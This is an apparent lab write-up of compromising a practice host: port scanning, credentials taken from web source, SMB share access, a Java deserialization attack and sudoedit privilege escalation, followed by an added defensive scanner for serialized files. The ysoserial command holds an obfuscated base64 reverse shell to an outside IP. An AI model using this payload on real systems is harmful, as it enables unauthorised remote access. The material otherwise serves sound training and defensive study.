Date
Mar 20, 2025 → Mar 20, 2025
Tag
Nmap
Brute Force
Privilege Escalation Techniques
192.168.247.116
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Nmap scan report for 192.168.247.116
Host is up (0.071s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT
Warning: 192.168.247.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.247.116
Host is up (0.061s latency).
All 65535 scanned ports on 192.168.247.116 are in ignored states.
Not shown: 65387 open|filtered udp ports (no-response), 148 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.82 seconds
80

brute force


No more information, but we can download two files that contain the port 80 website and the port 8080 website,
and we can find the username and password in the 8080 website's source code.

8080
After we log in, we can see the page below.


We can also find the filename of the data.

But there is nothing more to do on port 8080, so we check the other ports.
445,139

We found that we can access the shared drive on this host.


ysoserial
Use this script to replace the .ser file.
java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMTU4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > recycler.ser


After replacing the .ser file, we get a shell.
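From the defender's side, a replaced .ser file on a writable share can be caught before the application loads it. The following is an added example, not part of the original notes: a heuristic triage that lists the class names declared in a Java serialization stream and flags library packages the application has no reason to deserialize. The prefix list, the `com.example.app.Recycler` class name and the sample byte strings are assumptions constructed for illustration.

```python
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization magic + stream version
TC_CLASSDESC = 0x72                 # marks the start of a class descriptor

# Assumption: illustrative package prefixes to flag, not a complete list.
SUSPECT_PREFIXES = ("org.apache.commons.collections", "org.apache.xalan.",
                    "com.sun.org.apache.xalan.")

def _looks_like_class(raw: bytes) -> bool:
    return raw.isascii() and all(chr(b).isalnum() or chr(b) in "._$[;" for b in raw)

def class_names(data: bytes) -> list:
    """Heuristic: TC_CLASSDESC, 2-byte big-endian length, name, 8-byte serialVersionUID."""
    if not data.startswith(STREAM_MAGIC):
        return []
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3:i + 3 + n]
            if 0 < n == len(raw) and i + 11 + n <= len(data) and _looks_like_class(raw):
                names.append(raw.decode("ascii"))
                i += 11 + n  # skip tag, length, name and serialVersionUID
                continue
        i += 1
    return names

def triage(data: bytes) -> dict:
    """Summarise one file's bytes for review before the application loads it."""
    names = class_names(data)
    return {"java_serialized": data.startswith(STREAM_MAGIC),
            "classes": names,
            "suspect": [n for n in names if n.startswith(SUSPECT_PREFIXES)]}

def _desc(name: str) -> bytes:
    """Build a constructed class descriptor for the samples below."""
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode() + b"\x00" * 8

# Constructed samples (not real application data or a working payload).
BENIGN = STREAM_MAGIC + b"\x73" + _desc("com.example.app.Recycler") + b"\x02\x00\x00\x78\x70"
FLAGGED = (STREAM_MAGIC + b"\x73" + _desc("java.util.PriorityQueue") + b"\x03\x00\x00\x78\x70\x73"
           + _desc("org.apache.commons.collections4.comparators.TransformingComparator")
           + b"\x02\x00\x00\x78\x70")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(label, triage(blob))
```

A flagged file is a signal to block the load and review who can write to the share; the durable fix is an allowlist deserialization filter (`java.io.ObjectInputFilter`) in the application together with removing write access to the directory it reads from.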


We can use sudoedit.


We can edit it if we want,
so we add our account.


Successful root.
